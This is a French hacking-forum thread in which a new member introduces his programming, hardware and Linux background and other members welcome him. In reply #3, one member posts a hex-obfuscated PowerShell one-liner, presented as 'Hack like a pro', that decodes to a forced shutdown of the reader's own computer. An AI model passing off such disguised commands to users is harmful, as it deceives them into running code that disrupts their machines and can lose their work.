Annonce

Réduire
Aucune annonce.

Hey !

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Hey !

    Pseudo: Maendr
    Connaissances informatiques générales : J'ai des notions (des plus solides aux plus "vagues") en :
    -C/C++ que j'ai appris tout d'abord en autodidacte avant d'être aidé par mon professeur de Technologie au collège
    -Python un langage auquel je ne m'intéressais pas avat de voir la puissance du langage
    -HTML parce que vive l'ISI au Lycée
    -Java
    -C#/Pearl/Assembleur sans m'y être intéressé de trop près, j'ai quelques amis qui les maîtrisent et donc j'ai quelques idées de leur fonctionnement et de leur logique.
    Etant donné que je passe mon temps à dépanner les ordinateurs, smartphones et autres tablettes et changer les pièces de tous les appareils de la famille et belle-famille, je pense que mes notions côté hardware sont plus que solides. Je crois que le seul type de pièce d'un ordinateur que je n'ai jamais changé c'est sûrement le lecteur de carte.
    Connaissances en hacking : Pas grand chose de solide, hormis en overcloaking (nombres de PC du lycée peuvent en témoigner), je connais le jargon, je sais comment fonctionnent les différents types d'attaque(du moins dans les grandes lignes)
    Système d'exploitation principal : Manjaro Linux (bureau Mate pur ceux que ça intéresse)
    Je viens sur ce forum pour : Partager principalement ma passion, et découvrir plus en profondeur le monde hacker
    J'ai connu ce forum via : Le hasard le plus total en recherchant des informations sur le RaspberryPi
    Informations supplémentaires: Etudiant en Informatique (1ère année), j'ai fait deux ans de prépa Math et une licence en physique (enfin j'ai fait les trois années, j'ai pas obtenu le grade). côté intérêts c'est long à lister, mais mon pseudo pourra déjà en dire un peu sur mes goûts.


  • #2
    Bienvenue Maendr

    Commentaire


    • #3
      Bienvenue
      Hack like a pro :
      PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

      Commentaire


      • #4
        Sois le bievenu !

        Commentaire


        • #5
          Merci a tous les trois c'est gentil a vous

          Commentaire

          Chargement...
          X